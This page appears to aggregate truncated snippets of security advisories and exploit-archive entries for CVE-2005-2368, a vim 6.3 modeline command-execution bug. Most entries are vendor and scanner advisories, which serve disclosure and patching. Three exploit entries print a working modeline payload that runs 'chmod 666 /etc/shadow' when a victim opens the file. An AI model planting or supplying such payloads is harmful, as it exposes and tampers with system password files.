RHEL 4 : vim (RHSA-2005:745)

The remote Redhat Enterprise Linux 4 host has packages installed that are affected by a vulnerability as referenced in the RHSA-2005:745 advisory. VIM VIsual editor iMproved is a version of the vi editor. A bug was found in the way VIM processes modelines. If a user with modelines enabled opens a...

vim security update

CentOS Errata and Security Advisory CESA-2005:745-01 Updated vim packages that fix a security issue are now available. This update has been rated as having low security impact by the Red Hat Security Response Team. VIM VIsual editor iMproved is a version of the vi editor. A bug was found in the w...

X11, netpbm, vim security update

CentOS Errata and Security Advisory CESA-2005:745 Updated netpbm packages that fix a security issue are now available. This update has been rated as having low security impact by the Red Hat Security Response Team. The netpbm package contains a library of functions that support programs for...

security flaw

vim 6.3 before 6.3.082, with modelines enabled, allows external user-assisted attackers to execute arbitrary commands via shell metacharacters in the 1 glob or 2 expand commands of a foldexpr expression for calculating fold levels...

Low: Red Hat Security Advisory: vim security update

Updated vim packages that fix a security issue are now available. This update has been rated as having low security impact by the Red Hat Security Response Team. VIM VIsual editor iMproved is a version of the vi editor. A bug was found in the way VIM processes modelines. If a user with modelines...

Fedora Core 3 : vim-6.3.086-0.fc3.1 (2005-741)

CVE-2005-2368 This update is supposed to fix GTK2 dependency problems of the vim-6.3.086-0.fc3 package. Note that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much...

Fedora Core 3 : vim-6.3.086-0.fc3 (2005-738)

CVE-2005-2368 Note that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues. %NASLMINLEVEL 70300 C Tenable Network...

Fedora Core 4 : vim-6.3.086-0.fc4 (2005-737)

CVE-2005-2368 Note that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues. %NASLMINLEVEL 70300 C Tenable Network...

FreeBSD : vim -- vulnerabilities in modeline handling: glob, expand (81f127a8-0038-11da-86bc-000e0c2e438a)

Georgi Guninski discovered a way to construct Vim modelines that execute arbitrary shell commands. The vulnerability can be exploited by including shell commands in modelines that call the glob or expand functions. An attacker could trick an user to read or edit a trojaned file with modelines...

USN-154-1: vim vulnerability

Georgi Guninski discovered that it was possible to construct Vim modelines that execute arbitrary shell commands by wrapping them in glob or expand function calls. If an attacker tricked an user to open a file with a specially crafted modeline, he could exploit this to execute arbitrary commands...

CVE-2005-2368

CVE-2005-2368 affects Vim (pre-6.3.082) where, with modelines enabled, a crafted modeline could cause execution of arbitrary commands via shell metacharacters in fold-related expressions. The security issue has been addressed in multiple advisories (RHSA-2005:745, CentOS/CESA-2005:745-01, MDKSA-2...

CVE-2005-2368

vim 6.3 before 6.3.082, with modelines enabled, allows external user-assisted attackers to execute arbitrary commands via shell metacharacters in the 1 glob or 2 expand commands of a foldexpr expression for calculating fold levels...

CVE-2005-2368

vim 6.3 before 6.3.082, with modelines enabled, allows external user-assisted attackers to execute arbitrary commands via shell metacharacters in the 1 glob or 2 expand commands of a foldexpr expression for calculating fold levels...

DEBIAN-CVE-2005-2368

vim 6.3 before 6.3.082, with modelines enabled, allows external user-assisted attackers to execute arbitrary commands via shell metacharacters in the 1 glob or 2 expand commands of a foldexpr expression for calculating fold levels...

CVE-2005-2368

vim 6.3 before 6.3.082, with modelines enabled, allows external user-assisted attackers to execute arbitrary commands via shell metacharacters in the 1 glob or 2 expand commands of a foldexpr expression for calculating fold levels...

Unfiltered shell characters in vim editor

modelines mode shell characters problem on file open...

vim 6.3 < 6.3.082 - 'modlines' Local Command Execution

1 open up a text file. 2 insert at the top the information below. / vim: foldmethod=expr:foldexpr=glob"chmod\ 666\ /etc/shadow" / 3 if modlines = on anyone that opens the file with vim will execute the command: chmod 666 /etc/shadow Have fun making your own commands. The advisory can be found at:...

vim 6.3 < 6.3.082 (modlines) Local Command Execution Exploit

Exploit for multiple platform in category local exploits ============================================================ vim 6.3 6.3.082 modlines Local Command Execution Exploit ============================================================ 1 open up a text file. 2 insert at the top the information...

vim 6.3 6.3.082 - modlines Local Command Execution

vim 6.3 6.3.082 - modlines Local Command Execution 1 open up a text file. 2 insert at the top the information below. / vim: foldmethod=expr:foldexpr=glob"chmod\ 666\ /etc/shadow" / 3 if modlines = on anyone that opens the file with vim will execute the command: chmod 666 /etc/shadow Have fun maki...

[Full-disclosure] Help poor children in Uganda

Georgi Guninski security advisory 75, 2005 Help poor children in Uganda Systems affected: vim 6.3 Date: 25 July 2005 Legal Notice: This Advisory is Copyright c 2005 Georgi Guninski. You may not modify it and distribute it or distribute parts of it without the author's written permission - this...